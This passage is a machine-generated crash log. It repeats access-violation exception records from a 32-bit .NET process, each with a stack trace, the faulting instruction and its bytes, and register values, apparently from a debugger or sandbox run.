DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254260
registers.edi: 4254484
registers.eax: 0
registers.ebp: 4254496
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 46180956
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xc8e740
0xc8aa23
0xc8a4af
0xc8a3c5
0xc8900a
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254472
registers.edi: 4254760
registers.eax: 0
registers.ebp: 4254480
registers.edx: 0
registers.ebx: 4256364
registers.esi: 46180956
registers.ecx: 48860636
1 0 0

__exception__

 stacktrace: 
0xc8a5ee
0xc8a4af
0xc8a3c5
0xc8900a
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254260
registers.edi: 4254484
registers.eax: 0
registers.ebp: 4254496
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 46180956
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xc8e740
0xc8aa23
0xc8a4af
0xc8a3c5
0xc8900a
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254472
registers.edi: 4254760
registers.eax: 0
registers.ebp: 4254480
registers.edx: 0
registers.ebx: 4256364
registers.esi: 46180956
registers.ecx: 45685636
1 0 0

__exception__

 stacktrace: 
0xc8ebc4
0xc8ea70
0xc8a3ad
0xc892a8
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254264
registers.edi: 4254488
registers.eax: 0
registers.ebp: 4254500
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xc8e740
0xc8efaf
0xc8ea70
0xc8a3ad
0xc892a8
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254476
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254484
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 47120040
1 0 0

__exception__

 stacktrace: 
0xc8ebc4
0xc8ea70
0xc8a3c5
0xc892a8
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254264
registers.edi: 4254488
registers.eax: 0
registers.ebp: 4254500
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xc8e740
0xc8efaf
0xc8ea70
0xc8a3c5
0xc892a8
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254476
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254484
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 48468960
1 0 0

__exception__

 stacktrace: 
0xc8ebc4
0xc8ea70
0xc8a3c5
0xc892a8
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254264
registers.edi: 4254488
registers.eax: 0
registers.ebp: 4254500
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xc8e740
0xc8efaf
0xc8ea70
0xc8a3c5
0xc892a8
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254476
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254484
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 49817880
1 0 0

__exception__

 stacktrace: 
0xc8f2a3
0xc8f128
0xc8a3ad
0xc893a7
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254276
registers.edi: 4254500
registers.eax: 0
registers.ebp: 4254512
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xc8e740
0xc8f643
0xc8f128
0xc8a3ad
0xc893a7
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254488
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254496
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 47039488
1 0 0

__exception__

 stacktrace: 
0xc8f2a3
0xc8f128
0xc8a3c5
0xc893a7
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254276
registers.edi: 4254500
registers.eax: 0
registers.ebp: 4254512
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0xc8e740
0xc8f643
0xc8f128
0xc8a3c5
0xc893a7
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8e783
registers.esp: 4254488
registers.edi: 4254788
registers.eax: 0
registers.ebp: 4254496
registers.edx: 0
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 46427180
1 0 0

__exception__

 stacktrace: 
0xc8f2a3
0xc8f128
0xc8a3c5
0xc893a7
0xc887de
0xc87cbf
0xc825cd
0xc820de
0xc805c8
0xc80094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72682652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7269264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72692e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x727474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72747610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x727d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x727d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x727d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x727d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72d2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72da7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72da4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 84 17 f2 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xc8aef6
registers.esp: 4254276
registers.edi: 4254500
registers.eax: 0
registers.ebp: 4254512
registers.edx: 15865364
registers.ebx: 4256364
registers.esi: 45448924
registers.ecx: 0
